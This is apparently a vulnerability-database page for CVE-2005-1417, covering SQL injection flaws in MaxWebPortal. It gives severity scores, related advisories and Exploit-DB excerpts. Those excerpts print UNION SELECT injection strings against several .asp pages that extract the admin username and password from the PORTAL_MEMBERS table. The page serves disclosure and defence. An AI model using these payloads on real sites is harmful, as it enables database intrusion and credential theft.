CVE-2005-1417
published 2005-05-03CVE-2005-1417: Multiple SQL injection vulnerabilities in MaxWebPortal 2.x, 1.35, and other versions allow remote attackers to execute arbitrary SQL commands via (1)…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.46%
82.5th percentile
Multiple SQL injection vulnerabilities in MaxWebPortal 2.x, 1.35, and other versions allow remote attackers to execute arbitrary SQL commands via (1) article_popular.asp, (2) arguments to dl_popular.asp, (3) arguments to links_popular.asp, (4) arguments to pic_popular.asp, (5) article_rate.asp, (6) dl_rate.asp, (7) links_rate.asp, (8) pic_rates.asp, (9) article_toprated.asp, (10) dl_toprated.asp, (11) links_toprated.asp, (12) arguments to pic_toprated.asp, or (13) the TOPIC_ID or Forum_ID parameters to custom_link.asp.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| maxwebportal | maxwebportal | — | — |
| maxwebportal | maxwebportal | — | — |
| maxwebportal | maxwebportal | — | — |
| maxwebportal | maxwebportal | — | — |
| maxwebportal | maxwebportal | — | — |
| maxwebportal | maxwebportal | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-x96g-vp28-xf6f: Multiple SQL injection vulnerabilities in forum
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2009-3436 [HIGH] CWE-89 GHSA-x96g-vp28-xf6f: Multiple SQL injection vulnerabilities in forum
Multiple SQL injection vulnerabilities in forum.asp in MaxWebPortal allow remote attackers to execute arbitrary SQL commands via the (1) FORUM_ID or (2) CAT_ID parameter. NOTE: this might overlap CVE-2005-1417.
GHSA
GHSA-8g92-h84q-8v35: Multiple SQL injection vulnerabilities in MaxWebPortal 2
ghsa_unreviewed·2022-05-01
CVE-2005-1417 [HIGH] GHSA-8g92-h84q-8v35: Multiple SQL injection vulnerabilities in MaxWebPortal 2
Multiple SQL injection vulnerabilities in MaxWebPortal 2.x, 1.35, and other versions allow remote attackers to execute arbitrary SQL commands via (1) article_popular.asp, (2) arguments to dl_popular.asp, (3) arguments to links_popular.asp, (4) arguments to pic_popular.asp, (5) article_rate.asp, (6) dl_rate.asp, (7) links_rate.asp, (8) pic_rates.asp, (9) article_toprated.asp, (10) dl_toprated.asp, (11) links_toprated.asp, (12) arguments to pic_toprated.asp, or (13) the TOPIC_ID or Forum_ID parameters to custom_link.asp.
No detection rules found.
Exploit-DB
Maxwebportal 1.3 - 'dl_toprated.asp' SQL Injection
exploitdb·2005-05-02
CVE-2005-1417 Maxwebportal 1.3 - 'dl_toprated.asp' SQL Injection
Maxwebportal 1.3 - 'dl_toprated.asp' SQL Injection
---
source: https://www.securityfocus.com/bid/13466/info
MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
dl_toprated.asp?10 RATING,Votes,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1
FROM DL union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union
select
Exploit-DB
Maxwebportal 1.3 - 'custom_link.asp' Multiple SQL Injections
exploitdb·2005-05-02
CVE-2005-1417 Maxwebportal 1.3 - 'custom_link.asp' Multiple SQL Injections
Maxwebportal 1.3 - 'custom_link.asp' Multiple SQL Injections
---
source: https://www.securityfocus.com/bid/13466/info
MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
custom_link.asp?method=Topic&TOPIC_ID=[Sql inject]
custom_link.asp?method=Forum&Forum_ID=[Sql inject]
Exploit-DB
Maxwebportal 1.3 - 'links_popular.asp' SQL Injection
exploitdb·2005-05-02
CVE-2005-1417 Maxwebportal 1.3 - 'links_popular.asp' SQL Injection
Maxwebportal 1.3 - 'links_popular.asp' SQL Injection
---
source: https://www.securityfocus.com/bid/13466/info
MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Links_Popular.asp?10
LINK_ID,Hit,DESCRIPTION,NAME,POST_DATE,banner_url,1,1,1,1,1,1,1 FROM LINKS
union select m_username,m_password,1,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS
where
m_username='admin' union select
Exploit-DB
Maxwebportal 1.3 - 'dl_popular.asp' SQL Injection
exploitdb·2005-05-02
CVE-2005-1417 Maxwebportal 1.3 - 'dl_popular.asp' SQL Injection
Maxwebportal 1.3 - 'dl_popular.asp' SQL Injection
---
source: https://www.securityfocus.com/bid/13466/info
MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Dl_Popular.asp?40 DL_ID,Hit,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1 FROM DL
union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union
select
Exploit-DB
Maxwebportal 1.3 - 'pic_popular.asp' SQL Injection
exploitdb·2005-05-02
CVE-2005-1417 Maxwebportal 1.3 - 'pic_popular.asp' SQL Injection
Maxwebportal 1.3 - 'pic_popular.asp' SQL Injection
---
source: https://www.securityfocus.com/bid/13466/info
MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
pics_popular.asp?10 LINK_ID, HIT,NAME, URL, KEYWORD, DESCRIPTION, EMAIL,
POST_DATE,
BANNER_URL, CATEGORY, PARENT_ID, SHOW, BADLINK FROM pic union select
m_username,m_password,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union select
No writeups or analysis indexed.
http://secunia.com/advisories/15214http://securitytracker.com/id?1013845http://www.maxwebportal.info/downloads/mwp_security_fixes.ziphttp://www.maxwebportal.info/topic.asp?TOPIC_ID=2482&FORUM_ID=1&CAT_ID=1&Forum_Title=General+Chat&Topic_Title=Security+Updatehttp://www.securityfocus.com/bid/13466http://secunia.com/advisories/15214http://securitytracker.com/id?1013845http://www.maxwebportal.info/downloads/mwp_security_fixes.ziphttp://www.maxwebportal.info/topic.asp?TOPIC_ID=2482&FORUM_ID=1&CAT_ID=1&Forum_Title=General+Chat&Topic_Title=Security+Updatehttp://www.securityfocus.com/bid/13466
2005-05-03
Published